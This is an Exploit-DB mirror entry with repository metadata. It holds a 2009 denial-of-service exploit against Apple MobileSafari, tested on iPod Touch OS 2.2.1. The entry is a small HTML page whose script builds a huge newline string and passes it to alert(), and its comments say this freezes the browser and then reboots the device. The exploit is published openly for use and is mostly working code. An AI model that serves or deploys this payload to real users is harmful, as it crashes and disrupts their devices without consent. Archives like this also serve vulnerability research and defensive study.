exploit-db-mirror/exploits/windows/dos/9554.html
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
462 B
HTML

# Apple iPhone (MobileSafari) Crash & Reboot
# TheLeader, GSOG [st0p] hotmail [sp4m] com
# Shoutz: hacking.org.il nullbyte.org.il
# Tested on iPod Touch 2G, OS 2.2.1
# Launch MobileSafari, enter the page and MobileSafari will freeze.
# Wait for 4-5 minutes and the device will spontaneously reboot.
# Exploit:
<html>
<body>
<script>
var a = '';
for (var i = 1; i <= 500000; i++)
{
a += '\n';
}
alert(a);
</script>
</body>
</html>
# milw0rm.com [2009-08-31]